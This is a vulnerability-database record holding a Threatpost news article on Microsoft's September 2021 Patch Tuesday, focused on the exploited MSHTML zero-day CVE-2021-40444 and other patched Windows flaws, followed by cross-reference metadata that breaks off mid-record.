DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft Patches Actively Exploited Windows Zero-Day", "description": "In [September\u2019s Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability>) crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which \u2013 the Windows MSHTML zero-day \u2013 has been under active attack for nearly two weeks.\n\nOne other bug is listed as publicly known but isn\u2019t (yet) being exploited. Immersive Labs\u2019 Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it\u2019s \u201cquite a light Patch Tuesday\u201d \u2013 at least on the surface, that is.\n\nThe flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOf the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.\n\nOver the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) noted.\n\nSome observers pegged the top patching priority in this month\u2019s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft\u2019s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.\n\nDisclosed on Sept. 7, it\u2019s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.\n\n## Under Active Attack: CVE-2021-40444\n\nIt\u2019s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it\u2019s been nearly a week since attackers started to share blueprints on how to carry out an exploit.\n\nMicrosoft said last week that the flaw could let an attacker \u201ccraft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,\u201d after which \u201cthe attacker would then have to convince the user to open the malicious document.\u201d Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a [novel malware-obfuscation technique](<https://threatpost.com/microsoft-office-malware-protection-bypass/167652/>) to disable malicious macro warnings and deliver the ZLoader trojan.\n\nAn attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.\n\nSatnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.\n\n\u201cThere are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,\u201d Narang told Threatpost.\n\nLast Wednesday, Sept. 8, [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1435515875025633282>) \u2013 head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft \u2013 [noted](<https://twitter.com/GossiTheDog/status/1435562870331293706>) that the exploit had been in the wild for about a week or more.\n\nIt got worse: Last Thursday, Sept. 9, threat actors began [sharing exploit how-tos](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are \u201csimple to follow and [allow] anyone to create their own working version\u201d of the exploit, \u201cincluding a Python server to distribute the malicious documents and CAB files.\u201d\n\nIt took the publication all of 15 minutes to recreate the exploit.\n\nA week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had [urged mitigations](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.\n\nLast week, the company didn\u2019t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.\n\nMicrosoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.\n\nIn spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.\n\n## Mitigations That Don\u2019t Mitigate\n\nTracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended \u2013 mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.\n\nEmphasis on \u201ctry to:\u201d Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to [modify the exploit](<https://twitter.com/GossiTheDog/status/1435570418623070210>) so that it didn\u2019t use ActiveX, [effectively skirting Microsoft\u2019s mitigations](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/>).\n\nThe Zero Day Initiative [said that](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) for now, the most-effective defense is \u201cto apply the patch and avoid Office docs you aren\u2019t expecting to receive.\u201d\n\nBe sure to carefully review and install [all the needed patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for your setup: There\u2019s a long list of updates for specific platforms, and it\u2019s important not to slather on too thin a layer of protection.\n\nCredit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.\n\n## Baddest Bug Award\n\nThe award for baddest bug \u2013 or at least, the one with the highest severity rating, with a CVSS score of 9.8 \u2013 goes to [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>): a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.\n\n[OMI is an open-source project](<https://github.com/microsoft/omi>) to further the development of a production-quality implementation of the [DMTF CIM/WBEM](<https://www.dmtf.org/standards/cim>) standards.\n\n\u201cThis vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,\u201d the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.\n\n## Yet More PrintNightmare Patches\n\nMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671>) and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447>)), all rated important.\n\nThese are the three latest fixes in a steady [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler that followed the [disclosure of PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) in June. This probably won\u2019t be the last patch in that parade: Tenable\u2019s Narang told Threatpost that \u201cresearchers continue to discover ways to exploit Print Spooler\u201d and that the firm expects \u201ccontinued research in this area.\u201d\n\nOnly one \u2013 CVE-2021-38671 \u2013 of today\u2019s patch trio is rated as \u201cexploitation more likely.\u201d Regardless, organizations should prioritize patching these flaws as \u201cthey are extremely valuable to attackers in post-exploitation scenarios,\u201d Narang observed.\n\n## More \u2018Exploitation More Likely\u2019\n\nImmersive\u2019s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver ([CVE-2021-36955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955>), [CVE-2021-36963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963>), [CVE-2021-38633](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633>)) are also noteworthy, all of them being listed as \u201cexploitation more likely.\u201d\n\n\u201cLocal priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,\u201d Breen said via email. \u201cThis allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.\u201d\n\nOne glaring example of that emerged in May, when hundreds of millions of [Dell users were found to be at risk](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.\n\nThe three exploits Microsoft patched on Tuesday aren\u2019t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.\n\nTwo other vulnerabilities \u2013 [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>), both Win32k escalation of privilege flaws \u2013 have also been listed as \u201cexploitation more likely\u201d and, together, cover the full range of supported Windows versions.\n\nBreen said that he\u2019s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They\u2019re not rated as high a severity risk as RCE bugs, but \u201cthese local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,\u201d he asserted. \u201cIf you can block them here you have the potential to significantly limit their damage.\u201d\n\nhe added, \u201cIf we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,\u201d Breen said.\n\n## Still, This RCE Is Pretty Important\n\nDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965>) \u2013 an important-rated Windows WLAN AutoConfig Service RCE vulnerability \u2013 given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.\n\nThe WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.\n\nThe patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.\n\nAs the Zero Day Initiative explained, that means an attacker could \u201ccompletely take over the target \u2013 provided they are on an adjacent network.\u201d That would come in quite handy in a [coffee-shop attack](<https://threatpost.com/microsoft-wi-fi-protection/145053/>), where multiple people use an unsecured Wi-Fi network.\n\nThis one \u201cis especially alarming,\u201d Kim said: Think [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) and PrintNightmare.\n\n\u201cAs recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,\u201d he said in an email.\n\nKim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.\n\n\u201cIt specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker\u2019s end goal,\u201d he predicted. \u201cRemote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise\u2019s data.\u201d\n\nThe Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so \u201cdon\u2019t let the adjacent aspect of this bug diminish the severity,\u201d it said. \u201cDefinitely test and deploy this patch quickly.\u201d\n\n## And Don\u2019t Forget to Patch Chrome\n\nBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft\u2019s Chromium-based Edge.\n\nBrowsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.\n\n\u201cI cannot underestimate the importance of patching your browsers and keeping them up to date,\u201d he stressed. \u201cAfter all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you\u2019re thinking about your online banking or the data collected and stored by your organization\u2019s web apps, they could all be exposed by attacks that exploit the browser.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "published": "2021-09-14T20:29:14", "modified": "2021-09-14T20:29:14", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "reporter": "Lisa Vaas", "references": ["https://msrc.microsoft.com/update-guide/vulnerability", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb", "https://threatpost.com/microsoft-office-malware-protection-bypass/167652/", "https://twitter.com/GossiTheDog/status/1435515875025633282", "https://twitter.com/GossiTheDog/status/1435562870331293706", "https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/", "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444", "https://twitter.com/GossiTheDog/status/1435570418623070210", "https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/", "https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647", "https://github.com/microsoft/omi", "https://www.dmtf.org/standards/cim", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447", "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633", "https://threatpost.com/dell-kernel-privilege-bugs/165843/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965", "https://threatpost.com/microsoft-wi-fi-protection/145053/", "https://threatpost.com/solarwinds-default-password-access-sales/162327/", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar", "https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar"], "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "immutableFields": [], "lastseen": "2021-09-16T18:44:44", "viewCount": 134, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:35FD7D35-F3F0-4CE6-A919-5DE145C48A21", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0544", "CPAI-2021-0545", "CPAI-2021-0550", "CPAI-2021-0554", "CPAI-2021-0592", "CPAI-2021-0684", "CPAI-2021-0686"]}, {"type": "cisa", "idList": ["CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-36955", "CISA-KEV-CVE-2021-38647", "CISA-KEV-CVE-2021-40444"]}, {"type": "cnvd", "idList": ["CNVD-2021-69088"]}, {"type": "cve", "idList": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"]}, {"type": "githubexploit", "idList": ["09412330-832C-538A-A226-61474048E41B", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "24DE1902-4427-5442-BF63-7657293966E2", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "610ADCD3-C281-52D4-A546-467569FE3AC1", "64DFB465-6754-5E4B-B311-7668EDD4D962", "6BC80C90-569E-5084-8C0E-891F12F1805E", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "745C9387-7E9D-5BA8-BC2D-5B3EF7DCE82A", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "8217668C-9748-5511-8C01-7E933D69F872", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8B4EDA16-9E27-500D-B648-9C3AD4295562", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "E06577DB-A581-55E1-968E-81430C294A84", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FF761088-559C-5E71-A5CD-196D4E4571B8"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043"]}, {"type": "ibm", "idList": ["1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520"]}, {"type": "ics", "idList": ["AA22-117A", "AA22-216A"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12286", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-CVE_2021_38648_OMIGOD-", "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-36955", "MS:CVE-2021-36963", "MS:CVE-2021-36965", "MS:CVE-2021-36975", "MS:CVE-2021-38633", "MS:CVE-2021-38639", "MS:CVE-2021-38647", "MS:CVE-2021-38667", "MS:CVE-2021-38671", "MS:CVE-2021-40444", "MS:CVE-2021-40447"]}, {"type": "mskb", "idList": ["KB5005563", "KB5005565", "KB5005566", "KB5005568", "KB5005569", "KB5005573", "KB5005575", "KB5005606", "KB5005607", "KB5005613", "KB5005615", "KB5005618", "KB5005623", "KB5005627", "KB5005633"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73", "MSRC:768A8F29C87F38A1D05DD51DD3C9B107", "MSRC:898825BF130FA4417637FC463F734C20"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164694", "PACKETSTORM:164925", "PACKETSTORM:165214", "PACKETSTORM:167317"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "saint", "idList": ["SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "SAINT:E5FBEA63E5EE8A91F5066541141037D1"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "talosblog", "idList": ["TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B"]}, {"type": "thn", "idList": ["THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:8A60310AB796B7372A105B7C8811306B", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:B399D1943153CEEF405B85D4310C2142", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E7762183A6F7B3DDB942D3F1F99748F6"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdt", "idList": ["1337DAY-ID-36967", "1337DAY-ID-37024", "1337DAY-ID-37126"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0544", "CPAI-2021-0545", "CPAI-2021-0550", "CPAI-2021-0554", "CPAI-2021-0592"]}, {"type": "cisa", "idList": ["CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cve", "idList": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"]}, {"type": "githubexploit", "idList": ["8B907536-B213-590D-81B9-32CF4A55322E"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12286", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66"]}, {"type": "mmpc", "idList": ["MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-36955", "MS:CVE-2021-36963", "MS:CVE-2021-36965", "MS:CVE-2021-36975", "MS:CVE-2021-38633", "MS:CVE-2021-38639", "MS:CVE-2021-38647", "MS:CVE-2021-38667", "MS:CVE-2021-38671", "MS:CVE-2021-40444", "MS:CVE-2021-40447"]}, {"type": "mskb", "idList": ["KB5005565"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "mssecure", "idList": ["MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "OMI_1_6_8_1.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164694"]}, {"type": "qualysblog", "idList": 